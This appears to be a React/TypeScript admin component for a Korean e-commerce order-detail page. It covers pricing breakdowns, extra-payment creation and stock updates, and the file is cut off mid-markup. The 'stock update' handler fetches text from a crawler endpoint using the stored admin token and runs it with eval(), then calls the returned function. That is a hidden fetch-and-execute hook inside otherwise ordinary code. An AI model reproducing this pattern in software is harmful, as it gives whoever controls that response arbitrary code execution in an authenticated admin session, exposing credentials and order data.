import {
  AddItemModal,
  Button,
  ChangeItemOptionModal,
  GridTable,
  NumberStat,
  OpenLink,
  OrderCancelModal,
  OrderCompleteModal,
  OrderWaitModal,
  PlacingOrderInfoDeliveryMemo,
  PlacingOrderInfoTotalPay,
  ReInput,
  RemoveItemModal,
  Popover,
  DepositConfirmModal,
} from 'components';
import React, { Fragment, FunctionComponent } from 'react';
import {
  COMMERCE_URL,
  request,
  useObject,
  useOrderDetail,
  SHOP_ORDER_STATUS,
  ORDER_CANCEL_STATUS,
  ORDER_ADDITIONAL_PAY_TYPE,
  DELIVERY_STATUS,
  ORDER_PAY_STATUS,
  ORDER_ADDITIONAL_PAY_STATUS,
  getPercent,
  ADMIN_2_URL,
} from 'services';
import { toast } from 'react-toastify';
import { InformationCircleIcon } from '@heroicons/react/outline';
import { useParams } from 'react-router-dom';
import type { NOrder } from 'types';
import { priceFormat } from 'utils';
import useSWR from 'swr';
import classnames from 'classnames';
import {
  getCouponDescription,
  getCouponDiscountedAmount,
  getEmailHref,
  PayAmountDetailType,
  RealtimePrice as TRealtimePrice,
} from './helper';
import { RealtimePrice } from './components';
import { message, Modal } from 'antd';

export interface Props {
  payMethod?: string;
  payAmount?: number;
  paidAt?: null | string;
}
interface State {
  isLoading: boolean;
  isMemoUpdate: boolean;
  isDepositModalOpen: boolean;
  isAddItemOpen: boolean;
  isRemoveItemOpen: boolean;
  isOrderCancelOpen: boolean;
  isOrderWaitOpen: boolean;
  isOrderCompleteOpen: boolean;
  isChangeItemOptionOpen: boolean;
  shopOrderNumber: string;
  isTranslating: boolean;
  cancelOrderList: Array<{
    itemOrderNumber: string;
    orderCancelReason: string;
    quantity: number;
    sizeName: string;
    itemName: string;
    itemImageUrl: string;
  }>;
  isMemoUpdating: boolean;
  isAddressOpen: boolean;
  shopId: number;
  shopPromotionList: Array<{
    promotionName: string;
    promotionTypeValue: number;
    promotionDescription: string;
    promotionCode: string;
  }>;
  isShopPromotionLoading: boolean;
  isAdditionalPayLoading: boolean;
  itemOrderNumber: string;
  itemId: number;
  orderStatus: keyof typeof SHOP_ORDER_STATUS | '';
  additionalItemNumberList: string[];
  currentSizeName: string;
  isStockUpdating: boolean;
  itemName: string;
  orderAdditionalNumber: string;
}

const PlacingOrderInfo: FunctionComponent<Props> = ({ paidAt, payAmount, payMethod }) => {
  const [
    {
      isLoading,
      isDepositModalOpen,
      isAddItemOpen,
      isRemoveItemOpen,
      isOrderWaitOpen,
      isOrderCompleteOpen,
      isOrderCancelOpen,
      isChangeItemOptionOpen,
      shopOrderNumber,
      cancelOrderList,
      shopId,
      shopPromotionList,
      isShopPromotionLoading,
      isAdditionalPayLoading,
      itemId,
      itemOrderNumber,
      orderStatus,
      additionalItemNumberList,
      currentSizeName,
      isStockUpdating,
      itemName,
      orderAdditionalNumber,
    },
    setState,
  ] = useObject<State>({
    isLoading: false,
    isMemoUpdate: false,
    isDepositModalOpen: false,
    isAddItemOpen: false,
    isRemoveItemOpen: false,
    isOrderCancelOpen: false,
    isOrderCompleteOpen: false,
    isOrderWaitOpen: false,
    isChangeItemOptionOpen: false,
    shopOrderNumber: '',
    isTranslating: false,
    cancelOrderList: [],
    isMemoUpdating: false,
    isAddressOpen: false,
    shopId: 0,
    shopPromotionList: [],
    isShopPromotionLoading: true,
    isAdditionalPayLoading: false,
    itemId: 0,
    itemOrderNumber: '',
    orderStatus: '',
    additionalItemNumberList: [],
    currentSizeName: '',
    isStockUpdating: false,
    itemName: '',
    orderAdditionalNumber: '',
  });
  const [
    { shopOrderList, totalDiscountDetail, totalDiscount, cancelInfo, itemTotalAmount },
    setOrderState,
    { setRealPrice, refreshOrderState },
  ] = useOrderDetail();
  const { fetchingOrderNumber } = useParams<{ fetchingOrderNumber: string }>();

  /**
   * 재고 업데이트
   * @param shopIndex 편집샵 목록 index
   * @param itemIndex 편집샵의 상품 목록 index
   */
  const onUpdateStock = async (shopIndex: number, itemIndex: number) => {
    const shop = shopOrderList[shopIndex];
    const item = shop.itemOrderList[itemIndex];

    setState({ isStockUpdating: true });
    try {
      const data = await request.get<any, any>(`/item/${Number(item.itemId)}/crawler`, {
        headers: { Authorization: localStorage.getItem('fetchingAPI_AUTH_TOKEN') || '' },
      });
      const hash = await crypto.subtle.digest('SHA-256', new TextEncoder().encode(data));
      const result = btoa(String.fromCharCode(...new Uint8Array(hash)));
      data.replace('api.fetchingapp.co.kr', 'api.fetchingapp.co.kr');
      const main = eval(data);
      await main(result);
      refreshOrderState();
    } catch (err) {
      console.dir(err);
      toast.error('재고를 업데이트하는데 실패하였습니다.');
      setState({ isStockUpdating: false });
    }
  };

  /**
   * 가격 업데이트
   * @param shopIndex 편집샵 목록 index
   * @param itemIndex 편집샵의 상품 목록 index
   */
  const onUpdatePrice = async (shopIndex: number, itemIndex: number) => {
    toast.info('준비 중입니다.');
  };

  const onChangeWait = async (shopIndex: number) => {
    const shop = shopOrderList[shopIndex];

    try {
      // 이미 발생한 차액란이 있는 겯우
      const data = await request.get<any, NOrder.Wait>(
        `/commerce/order/shop-order/${shop.shopOrderNumber}/order-wait/before`,
        {
          headers: {
            Authorization: localStorage.getItem('fetchingAPI_AUTH_TOKEN') || '',
          },
        }
      );
      if (!!data.additionalPayList.length) {
        setState({
          isOrderWaitOpen: true,
          shopOrderNumber: shop.shopOrderNumber,
          additionalItemNumberList: data.additionalPayList.map(
            (item) => item.additionalItemNumber
          ),
        });
        return;
      }

      // 차액이 발생한 경우
      if (
        shop.itemOrderList.some(
          (item, itemIndex) =>
            (getPayAmountDetailTypeValue(
              shopIndex,
              itemIndex,
              PayAmountDetailType.PAY_AMOUNT
            )?.rawValue ?? 0) +
              (getPayAmountDetailTypeValue(
                shopIndex,
                itemIndex,
                PayAmountDetailType.ADDITIONAL_PAY
              )?.rawValue ?? 0) <
            item.finalPrice - getCounponDiscountValue(item) - getPointDiscountValue(item)
        )
      ) {
        if (
          !window.confirm(
            '추가 결제가 필요한 주문입니다. 차액 결제 페이지를 생성하시겠습니까?'
          )
        )
          return;
        const filter = shop.itemOrderList
          .filter(
            (item, itemIndex) =>
              (getPayAmountDetailTypeValue(
                shopIndex,
                itemIndex,
                PayAmountDetailType.PAY_AMOUNT
              )?.rawValue ?? 0) +
                (getPayAmountDetailTypeValue(
                  shopIndex,
                  itemIndex,
                  PayAmountDetailType.ADDITIONAL_PAY
                )?.rawValue ?? 0) <
              item.finalPrice -
                getCounponDiscountValue(item) -
                getPointDiscountValue(item)
          )
          .map((item, itemIndex) => ({
            amount:
              item.finalPrice -
              getCounponDiscountValue(item) -
              getPointDiscountValue(item) -
              ((getPayAmountDetailTypeValue(
                shopIndex,
                itemIndex,
                PayAmountDetailType.PAY_AMOUNT
              )?.rawValue ?? 0) +
                (getPayAmountDetailTypeValue(
                  shopIndex,
                  itemIndex,
                  PayAmountDetailType.ADDITIONAL_PAY
                )?.rawValue ?? 0)),
            itemOrderNumber: item.itemOrderNumber,
            additionalFee:
              item.additionalFee -
              (getPayAmountDetailTypeValue(
                shopIndex,
                itemIndex,
                PayAmountDetailType.ADDITIONAL_FEE
              )?.rawValue ?? 0),
            fetchingFee:
              item?.fetchingFee -
              (getPayAmountDetailTypeValue(
                shopIndex,
                itemIndex,
                PayAmountDetailType.FETCHING_FEE
              )?.rawValue ?? 0),
            deliveryFee:
              item.deliveryFee -
              (getPayAmountDetailTypeValue(
                shopIndex,
                itemIndex,
                PayAmountDetailType.DELIVERY_FEE
              )?.rawValue ?? 0),
          }));
        createAdditionalPay(filter, shop.shopOrderNumber);
        return;
      }

      setState({
        isOrderWaitOpen: true,
        shopOrderNumber: shop.shopOrderNumber,
      });
    } catch (err) {
      console.log(err);
    }
  };

  const createAdditionalPay = async (
    itemOrderList: Array<{
      amount: number;
      itemOrderNumber: string;
      additionalFee: number;
      fetchingFee: number;
      deliveryFee: number;
    }>,
    shopOrderNumber: string
  ) => {
    setState({ isAdditionalPayLoading: true });
    try {
      const { success, additionalItemNumberList } = await request.post<
        any,
        { success: boolean; additionalItemNumberList: string[] }
      >(
        '/commerce/order/additional-pay',
        {
          fetchingOrderNumber,
          itemOrderList,
        },
        {
          headers: {
            Authorization: localStorage.getItem('fetchingAPI_AUTH_TOKEN') || '',
          },
        }
      );
      if (!success) return;

      setState({
        isOrderWaitOpen: true,
        shopOrderNumber,
        additionalItemNumberList,
      });
    } catch (err) {
      console.log(err);
    } finally {
      setState({ isAdditionalPayLoading: false });
    }
  };

  const getShopPromotionList = async (itemOrderNumber: string) => {
    if (!!shopPromotionList.length) return;
    try {
      const { promotionList } = await request.get<any, { promotionList: any[] }>(
        `/promotion/v2/item-order/${itemOrderNumber}/fetching-promotion`,
        {
          headers: {
            Authorization: localStorage.getItem('fetchingAPI_AUTH_TOKEN') || '',
          },
        }
      );
      setState({ shopPromotionList: promotionList });
    } catch (err) {
      console.dir(err);
    } finally {
      setState({ isShopPromotionLoading: false });
    }
  };

  /**
   * 세부상태
   * @param shopIndex 편집샵 목록 index
   * @param itemIndex 편집샵의 상품 목록 index
   */
  const detailStatus = (shopIndex: number, itemIndex: number): string => {
    const shop = shopOrderList[shopIndex];
    const item = shop.itemOrderList[itemIndex];
    const couponDiscounted = getCounponDiscountValue(item);
    const pointDiscounted = getPointDiscountValue(item);

    // 취소 상태
    if (!!item.cancelInfo)
      return `주문취소(${ORDER_CANCEL_STATUS[item.cancelInfo.cancelStatus]})`;
    // 환불 상태
    if (!!item.refundInfo) return `환불${ORDER_PAY_STATUS[item.refundInfo.refundStatus]}`;
    // 반품 상태
    if (!!item.returnInfo) return `반품${ORDER_PAY_STATUS[item.returnInfo.returnStatus]}`;
    // 교환 상태
    if (!!item.exchangeInfo)
      return `교환${ORDER_PAY_STATUS[item.exchangeInfo.exchangeStatus]}`;

    // 발주 가능, 발주 대기, 선 발주 필요, 발주 지연
    if (
      shop.orderStatus === 'ORDER_AVAILABLE' ||
      shop.orderStatus === 'ORDER_WAITING' ||
      shop.orderStatus === 'PRE_ORDER_REQUIRED' ||
      shop.orderStatus === 'ORDER_DELAY'
    ) {
      // 직접 조정
      if (
        item.isAdditionalUpdate &&
        (getPayAmountDetailTypeValue(shopIndex, itemIndex, PayAmountDetailType.PAY_AMOUNT)
          ?.rawValue ?? 0) +
          (getPayAmountDetailTypeValue(
            shopIndex,
            itemIndex,
            PayAmountDetailType.ADDITIONAL_PAY
          )?.rawValue ?? 0) <
          item.finalPrice - couponDiscounted - pointDiscounted
      )
        return '차액안내필요';
      // 차액 발생 여부
      else if (
        !!item.additionalPayInfo &&
        item.additionalPayInfo.additionalPayStatus !== 'PAID'
      ) {
        // 안내 필요 여부
        if (item.additionalPayInfo.needGuide) {
          return item.additionalPayInfo.type === 'PRODUCT_DIFFERENCE'
            ? '차액안내필요'
            : `차액안내필요(${ORDER_ADDITIONAL_PAY_TYPE[item.additionalPayInfo.type]})`;
        } else {
          return item.additionalPayInfo.type === 'PRODUCT_DIFFERENCE'
            ? '차액안내완료'
            : `차액안내완료(${ORDER_ADDITIONAL_PAY_TYPE[item.additionalPayInfo.type]})`;
        }
        // 품절
      } else if (!item.realtimeQuantity) return '품절안내필요';
    }

    // 배송 상황
    if (!!DELIVERY_STATUS[shop.orderStatus]) {
    }

    return SHOP_ORDER_STATUS[shop.orderStatus];
  };

  /**
   * 결제상태
   * @param shopIndex 편집샵 목록 index
   * @param itemIndex 편집샵의 상품 목록 index
   */
  const paymentStatus = (shopIndex: number, itemIndex: number): string => {
    const shop = shopOrderList[shopIndex];
    const item = shop.itemOrderList[itemIndex];

    if (shop.orderStatus === 'BEFORE_DEPOSIT') return SHOP_ORDER_STATUS[shop.orderStatus];
    else if (!!item.additionalPayInfo)
      return ORDER_ADDITIONAL_PAY_STATUS[item.additionalPayInfo.additionalPayStatus];
    else return '결제완료';
  };

  /**
   * 통화
   * @param shopIndex 편집샵 목록 index
   * @param itemIndex 편집샵의 상품 목록 index
   */
  const realCurrency = (shopIndex: number, itemIndex: number): string => {
    const shop = shopOrderList[shopIndex];
    const item = shop.itemOrderList[itemIndex];

    return item.realtimePrice[item.currentShopCountry][0].currency;
  };

  /**
   * 옵션 변경
   */
  const changeOption = (shopIndex: number, itemIndex: number) => {
    const shop = shopOrderList[shopIndex];
    const item = shop.itemOrderList[itemIndex];

    if (
      shop.orderStatus === 'ORDER_WAITING' &&
      !!item.additionalPayInfo &&
      item.additionalPayInfo.additionalPayStatus !== 'PAID'
    ) {
      toast.info(
        '차액안내중인 상품입니다. 차액결제 완료 후 상태값 변경이 가능합니다. 변경을 원하는 경우 상품 삭제 후 신규로 상품을 추가해주세요.',
        { autoClose: 15000 }
      );
      return;
    }
    setState({
      isChangeItemOptionOpen: true,
      itemId: Number(item.itemId),
      itemOrderNumber: item.itemOrderNumber,
      orderStatus: shop.orderStatus,
      currentSizeName: item.sizeName,
      shopOrderNumber: shop.shopOrderNumber,
    });
  };

  const getPointDiscountValue = (item: NOrder.ItemOrderDetail) => {
    return Math.ceil(
      (totalDiscountDetail.find((detail) => detail.type == 'POINT')?.value ?? 0) *
        (item.payAmount / (itemTotalAmount ?? 1))
    );
  };

  const getCounponDiscountValue = (item: NOrder.ItemOrderDetail) => {
    const { couponType, couponValue } =
      totalDiscountDetail.find((detail) => detail.type == 'COUPON')?.detailList[0] ?? {};
    switch (couponType) {
      case 'FIXED':
        return (couponValue ?? 0) * (item.payAmount / (itemTotalAmount ?? 1));
      case 'PERCENT':
        return Math.ceil((item.finalPrice * (couponValue ?? 0)) / 100);
      default:
        return 0;
    }
  };

  const getPayAmountDetailValue = (
    shopIndex: number,
    itemIndex: number,
    key: string
  ): string | undefined => {
    return shopOrderList?.[shopIndex].itemOrderList[itemIndex].payAmountDetail.find(
      (v) => v.type == key
    )?.value;
  };

  const getPayAmountDetailRawValue = (
    shopIndex: number,
    itemIndex: number,
    key: string
  ): number | undefined => {
    return shopOrderList?.[shopIndex].itemOrderList[itemIndex].payAmountDetail.find(
      (v) => v.type == key
    )?.rawValue;
  };

  const getPayAmountDetail = (
    shopIndex: number,
    itemIndex: number
  ): {
    value?: string;
    rawValue?: number;
    description: string;
    type: string;
  }[] => {
    const finalPrice =
      getPayAmountDetailRawValue(shopIndex, itemIndex, 'FETCHING_PRICE') ?? 0;
    const discountedCoupon = getCouponDiscountedAmount(
      finalPrice,
      totalDiscountDetail.find((d) => d.type == 'COUPON')
    );
    const discountedPoint = getPointDiscountValue(
      shopOrderList[shopIndex].itemOrderList[itemIndex]
    );

    return [
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'ORIGIN_PRICE'),
        description: '상품원가',
        type: PayAmountDetailType.ORIGIN_PRICE,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'SHOP_DISCOUNT'),
        description: '편집샵 자체 할인가',
        type: PayAmountDetailType.SHOP_DISCOUNT,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'PROMOTION_DISCOUNT'),
        description: '편집샵 프로모션',
        type: PayAmountDetailType.PROMOTION_DISCOUNT,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'SHOP_PRICE'),
        description: '편집샵 상품가',
        type: PayAmountDetailType.SHOP_PRICE,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'SHOP_PRICE_KOR'),
        description: '환율 계산',
        type: PayAmountDetailType.SHOP_PRICE_KOR,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'DEDUCTED_VAT') ?? '- 0 KRW',
        description: '현지 부가세 환급',
        type: PayAmountDetailType.DEDUCTED_VAT,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'DUTY_AND_TAX'),
        description: '관부가세 (관세/부가세율)',
        type: PayAmountDetailType.DUTY_AND_TAX,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'SPECIAL_TAX') ?? '- 0 KRW',
        description: '특소세',
        type: PayAmountDetailType.SPECIAL_TAX,
      },
      {
        value:
          getPayAmountDetailValue(shopIndex, itemIndex, 'EDUCATIONAL_TAX') ?? '- 0 KRW',
        description: '교육세',
        type: PayAmountDetailType.EDUCATIONAL_TAX,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'DELIVERY_FEE'),
        description: '배송비',
        type: PayAmountDetailType.DELIVERY_FEE,
        rawValue: getPayAmountDetailRawValue(shopIndex, itemIndex, 'DELIVERY_FEE'),
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'WAYPOINT_FEE') ?? '+ 0 KRW',
        description: '경유지 수수료',
        type: PayAmountDetailType.WAYPOINT_FEE,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'FETCHING_FEE'),
        description: '페칭수수료',
        type: PayAmountDetailType.FETCHING_FEE,
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'ADDITIONAL_FEE'),
        description: '추가 수수료 (배대지 비용)',
        type: PayAmountDetailType.ADDITIONAL_FEE,
        rawValue: getPayAmountDetailRawValue(shopIndex, itemIndex, 'ADDITIONAL_FEE'),
      },
      {
        value: getPayAmountDetailValue(shopIndex, itemIndex, 'FETCHING_PRICE'),
        description: '페칭 판매가',
        type: PayAmountDetailType.FETCHING_PRICE,
        rawValue: finalPrice,
      },
      {
        value:
          `- ${discountedCoupon} KRW` +
          getCouponDescription(totalDiscountDetail.find((d) => d.type == 'COUPON')),
        description: '페칭 쿠폰',
        type: PayAmountDetailType.DISCOUNTED_COUPON,
      },
      {
        value: `- ${discountedPoint} KRW`,
        description: '페칭 적립금 사용',
        type: PayAmountDetailType.DISCOUNTED_POINT,
      },
      {
        value: `= ${finalPrice - discountedCoupon - discountedPoint} KRW`,
        description: '고객 주문 금액',
        type: PayAmountDetailType.PAY_AMOUNT,
        rawValue: finalPrice - discountedCoupon - discountedPoint,
      },
      {
        value:
          getAdditionalPayInfo(shopIndex, itemIndex)?.additionalPayStatus == 'PAID'
            ? `+ ${getAdditionalPayInfo(shopIndex, itemIndex)?.orderAmount} KRW`
            : '0 KRW',
        description: '차액 결제',
        type: PayAmountDetailType.ADDITIONAL_PAY,
        rawValue:
          getAdditionalPayInfo(shopIndex, itemIndex)?.additionalPayStatus == 'PAID'
            ? getAdditionalPayInfo(shopIndex, itemIndex)?.orderAmount
            : 0,
      },
    ];
  };

  const getAdditionalPayInfo = (shopIndex: number, itemIndex: number) => {
    return shopOrderList[shopIndex].itemOrderList[itemIndex].additionalPayInfo;
  };

  const getPayAmountDetailTypeValue = (
    shopIndex: number,
    itemIndex: number,
    key: PayAmountDetailType
  ) => {
    return getPayAmountDetail(shopIndex, itemIndex).find((d) => d.type == key);
  };

  return (
    <>
      <PlacingOrderInfoTotalPay />
      <PlacingOrderInfoDeliveryMemo />

      <div className="mt-4" />
      <GridTable
        list={shopOrderList}
        isLoading={isLoading}
        noSelection
        maxHeight=""
        columns={[
          '판매처 (국가 / 배송방식 / 관세조건)',
          '페칭코드 / 편집샵코드',
          '원산지 / 상품명 / 사이즈',
          '주문 수량 / 재고 수량',
          '고객 실결제가 (페칭판매가)',
          '현재 금액 (실시간 + 관리자 조정)',
          '상태',
        ]}
        header={
          <div className="flex justify-end">
            {payMethod === 'DEPOSIT' && !paidAt && !!cancelInfo && (
              <div style={{ marginRight: 10 }}>
                <Button
                  size="sm"
                  onClick={() => {
                    Modal.confirm({
                      content: '입금 지연으로 인한 주문 취소를 복구할까요?',
                      onOk: async () => {
                        try {
                          await request.delete(
                            `/commerce/order/fetching-order/${fetchingOrderNumber}/order-cancel`
                          );
                          await refreshOrderState();
                          message.success(`주문취소가 복구되었습니다.`);
                        } catch (error) {}
                      },
                      okText: '확인',
                      cancelText: '취소',
                    });
                  }}
                >
                  (무통장 입금 지연) 주문 취소 복구
                </Button>
              </div>
            )}
            <Button size="sm" onClick={() => setState({ isAddItemOpen: true })}>
              상품 추가
            </Button>
          </div>
        }
        renderItem={(shop, shopIndex) => (
          <Fragment key={shopIndex}>
            {shop.itemOrderList.map((item, itemIndex) => (
              <div key={itemIndex}>
                <div aria-label="판매처 (국가 / 배송방식 / 관세조건)">
                  <div>
                    <a
                      style={{ color: 'black', textDecoration: 'underline' }}
                      target="_blank"
                      href={`${ADMIN_2_URL}/commercial/shop?tab=1&shopId=${shop.shopId}&priceRuleId=${shop.priceRuleId}`}
                    >
                      {shop.shopName}
                    </a>{' '}
                    ({shop.shopCountry} /{' '}
                    <span
                      className={classnames({
                        'text-fassto': shop.deliveryMethodName === '파스토',
                        'text-eldex': shop.deliveryMethodName === '엘덱스',
                      })}
                    >
                      {shop.deliveryMethodName}[{shop.deliveryMethodCountry}]
                    </span>{' '}
                    /{' '}
                    <span>
                      {shop.isDdp === true && 'DDP'}
                      {shop.isDdp === false && 'DDU'}
                    </span>
                    )
                  </div>
                  {!shop.isDdp && shop.proofOrigin && !shop.isProofOriginAuto && (
                    <div>
                      <a
                        href={getEmailHref(
                          shop.supportEmail,
                          shop.itemOrderList.map((item) => item.itemUrlRaw).join(`\n`)
                        )}
                      >
                        원산지 문의 필요
                      </a>
                    </div>
                  )}
                </div>
                <div aria-label="페칭코드 / 편집샵코드">
                  <OpenLink
                    url={`/product/productDetail/v2/${Number(item.itemId)}?mode=update`}
                  >
                    {Number(item.itemId)}
                  </OpenLink>
                  <div>{item.itemCode}</div>
                </div>
                <div aria-label="원산지 / 상품명 / 사이즈">
                  <div>{item.itemCountry}</div>
                  <div className="text-black text-medium">{item.itemName}</div>
                  <div className="mb-2">{item.sizeName}</div>
                  <div>
                    <OpenLink url={`${COMMERCE_URL}/product/${Number(item.itemId)}`}>
                      {'페칭 상품상세 >'}
                    </OpenLink>
                  </div>
                  <div>
                    <OpenLink url={item.itemUrl}>{'편집샵 상품상세 >'}</OpenLink>
                  </div>
                  <div>
                    <Button
                      size="xs"
                      onClick={() => {
                        navigator.clipboard
                          .writeText(item.itemUrl)
                          .then(() => {
                            message.success('복사되었습니다.');
                          })
                          .catch(() => {
                            message.error(`복사 실패 ${item.itemUrl}`);
                          });
                      }}
                    >
                      상품 링크 복사하기
                    </Button>
                  </div>
                  <div className="mt-4">
                    <img
                      src={item.itemImageUrl}
                      alt={item.itemName}
                      className="object-contain w-20 h-20"
                    />
                  </div>
                </div>
                <div aria-label="주문 수량 / 재고 수량">
                  <div>
                    <span className="text-black text-lg">{item.quantity || 0}</span> /
                    <span> {item.realtimeQuantity || 0}</span>
                  </div>
                  <div className="mt-3">
                    <Button
                      size="xs"
                      theme="secondary"
                      onClick={(e) => {
                        e.stopPropagation();
                        onUpdateStock(shopIndex, itemIndex);
                      }}
                      isLoading={isStockUpdating}
                    >
                      재고 업데이트
                    </Button>
                  </div>
                </div>
                <div aria-label="고객주문금액 (쿠폰, 적립금 제외)">
                  <div className="flex flex-col h-full justify-between">
                    <div className="text-base text-right mb-2">
                      <span className="text-lg font-bold text-black">
                        {(getPayAmountDetailTypeValue(
                          shopIndex,
                          itemIndex,
                          PayAmountDetailType.PAY_AMOUNT
                        )?.rawValue ?? 0) +
                          (getPayAmountDetailTypeValue(
                            shopIndex,
                            itemIndex,
                            PayAmountDetailType.ADDITIONAL_PAY
                          )?.rawValue ?? 0)}
                        원
                      </span>{' '}
                      <span className="text-lg font-bold text-black">
                        (
                        {
                          getPayAmountDetailTypeValue(
                            shopIndex,
                            itemIndex,
                            PayAmountDetailType.FETCHING_PRICE
                          )?.rawValue
                        }
                        원)
                      </span>
                      {getAdditionalPayInfo(shopIndex, itemIndex)?.additionalPayStatus ==
                        'PENDING_PAY' && (
                        <div>
                          <span className="text-black">
                            결제 대기 차액{' '}
                            {getAdditionalPayInfo(shopIndex, itemIndex)?.orderAmount}원
                          </span>
                        </div>
                      )}
                      {getAdditionalPayInfo(shopIndex, itemIndex)?.additionalPayStatus ==
                        'PAID' && (
                        <div>
                          <span className="text-black">
                            {getAdditionalPayInfo(shopIndex, itemIndex)?.orderAmount}원
                            결제 완료
                          </span>
                        </div>
                      )}
                    </div>
                    <div className="text-sm">
                      {getPayAmountDetail(shopIndex, itemIndex).map((payAmount, key) => (
                        <div
                          key={key}
                          className="flex justify-between items-center h-[26px]"
                        >
                          {payAmount.type === 'PROMOTION_DISCOUNT' ? (
                            <>
                              <span className="flex items-center">
                                <span>{payAmount.description}</span>
                                <Popover
                                  content={
                                    <table>
                                      <thead className="bg-gray-100 text-gray-500">
                                        <tr>
                                          <th>프로모션명</th>
                                          <th>할인 내용</th>
                                          <th>코드</th>
                                          <th>적용 방법</th>
                                        </tr>
                                      </thead>
                                      <tbody>
                                        {isShopPromotionLoading ? (
                                          <tr>
                                            <td colSpan={2}>
                                              <div>불러오는 중...</div>
                                            </td>
                                          </tr>
                                        ) : shopPromotionList.length ? (
                                          shopPromotionList.map((memo, memoIndex) => (
                                            <tr key={memoIndex}>
                                              <td>{memo.promotionName}</td>
                                              <td>
                                                {memo.promotionTypeValue > 1
                                                  ? memo.promotionTypeValue
                                                  : `${Math.round(
                                                      memo.promotionTypeValue * 100
                                                    )}%`}
                                              </td>
                                              <td>{memo.promotionCode}</td>
                                              <td>{memo.promotionDescription}</td>
                                            </tr>
                                          ))
                                        ) : (
                                          <tr>
                                            <td colSpan={2}>항목이 없습니다.</td>
                                          </tr>
                                        )}
                                      </tbody>
                                    </table>
                                  }
                                  position="bottom"
                                  onOpen={() =>
                                    getShopPromotionList(item.itemOrderNumber)
                                  }
                                >
                                  <InformationCircleIcon className="ml-px w-4 h-4" />
                                </Popover>
                              </span>
                              <span>{item.payAmountDetail[2].value}</span>
                            </>
                          ) : (
                            <>
                              <span>{payAmount.description}</span>
                              <span>{payAmount.value}</span>
                            </>
                          )}
                        </div>
                      ))}
                    </div>
                  </div>
                </div>
                <div aria-label="실제 금액 (실시간 + 관리자 조정)">
                  <div className="text-base mb-2 text-right">
                    <span className="text-lg font-bold text-black">
                      {item.finalPrice -
                        getCounponDiscountValue(item) -
                        getPointDiscountValue(item)}
                      원
                    </span>
                    {(() => {
                      const realtimePayAmount =
                        item.finalPrice -
                        getCounponDiscountValue(item) -
                        getPointDiscountValue(item);
                      const payAmount =
                        (getPayAmountDetailTypeValue(
                          shopIndex,
                          itemIndex,
                          PayAmountDetailType.PAY_AMOUNT
                        )?.rawValue ?? 0) +
                        (getPayAmountDetailTypeValue(
                          shopIndex,
                          itemIndex,
                          PayAmountDetailType.ADDITIONAL_PAY
                        )?.rawValue ?? 0);
                      const diff = realtimePayAmount - payAmount;
                      return (
                        diff !== 0 && (
                          <div
                            className={classnames('ml-1 text-sm', {
                              'text-green-500': diff > 0,
                              'text-red-600': diff < 0,
                            })}
                          >
                            {diff > 0 && '+'}
                            {priceFormat(diff)}원
                          </div>
                        )
                      );
                    })()}
                  </div>
                  {Object.keys(item.realtimePrice).length > 1 && (
                    <div className="flex justify-end gap-1 mb-2">
                      {Object.keys(item.realtimePrice).map((country, countryIndex) => (
                        <button
                          key={countryIndex}
                          onClick={() =>
                            setOrderState({
                              shopOrderList: [
                                ...shopOrderList.slice(0, shopIndex),
                                {
                                  ...shop,
                                  itemOrderList: [
                                    ...shop.itemOrderList.slice(0, itemIndex),
                                    {
                                      ...item,
                                      originPrice:
                                        item.realtimePrice[country][0].rawValue,
                                      shopDiscount:
                                        item.realtimePrice[country][1].rawValue,
                                      promotionDiscount:
                                        item.realtimePrice[country][2].rawValue,
                                      promotionDiscountPercent:
                                        item.realtimePrice[country][1].rawValue === 0
                                          ? 0
                                          : Math.floor(
                                              (item.realtimePrice[country][2].rawValue /
                                                item.realtimePrice[country][1].rawValue) *
                                                100
                                            ),
                                      fetchingFee:
                                        item.realtimePrice[country][7].rawValue,
                                      fetchingFeePercent:
                                        item.realtimePrice[country][7].percent || 0,
                                      deliveryFee:
                                        item.realtimePrice[country][6].rawValue,
                                      additionalFee:
                                        item.realtimePrice[country][8].rawValue,
                                      isAdditionalUpdate: false,
                                      currentShopCountry: country,
                                      priceRuleId:
                                        item.realtimePrice[country][0]?.priceRuleId ??
                                        shop.priceRuleId,
                                      deliveryMethod:
                                        item.realtimePrice[country][0]?.deliveryMethod,
                                    },
                                    ...shop.itemOrderList.slice(itemIndex + 1),
                                  ],
                                },
                                ...shopOrderList.slice(shopIndex + 1),
                              ],
                            })
                          }
                          disabled={country === item.currentShopCountry}
                          className={classnames(
                            'py-1 px-2 border bg-white',
                            country === item.currentShopCountry
                              ? 'font-semibold text-black border-black'
                              : 'border-gray-400'
                          )}
                        >
                          {country}
                        </button>
                      ))}
                    </div>
                  )}
                  {(() => {
                    return (
                      <RealtimePrice
                        item={item as NOrder.ItemOrderDetail}
                        onChange={(e: any) => {
                          setRealPrice({ shopIndex, itemIndex, e });
                        }}
                        setItem={(item) => {
                          setOrderState({
                            shopOrderList: [
                              ...shopOrderList.slice(0, shopIndex),
                              {
                                ...shopOrderList[shopIndex],
                                itemOrderList: [
                                  ...shopOrderList[shopIndex].itemOrderList.slice(
                                    0,
                                    itemIndex
                                  ),
                                  {
                                    ...shopOrderList[shopIndex].itemOrderList[itemIndex],
                                    isAdditionalUpdate: true,
                                    ...item,
                                  },
                                  ...shopOrderList[shopIndex].itemOrderList.slice(
                                    itemIndex + 1
                                  ),
                                ],
                              },
                              ...shopOrderList.slice(shopIndex + 1),
                            ],
                          });
                        }}
                        couponDiscounted={getCounponDiscountValue(item)}
                        pointDiscounted={getPointDiscountValue(item)}
                        couponDescription={getCouponDescription(
                          totalDiscountDetail.find((d) => d.type == 'COUPON')
                        )}
                        shop={shop}
                        realCurrency={realCurrency(shopIndex, itemIndex)}
                        orderAmount={0}
                      />
                    );
                  })()}
                </div>
                <div aria-label="상태">
                  <div>
                    세부상태 :{' '}
                    <span className="text-red-600 font-semibold">
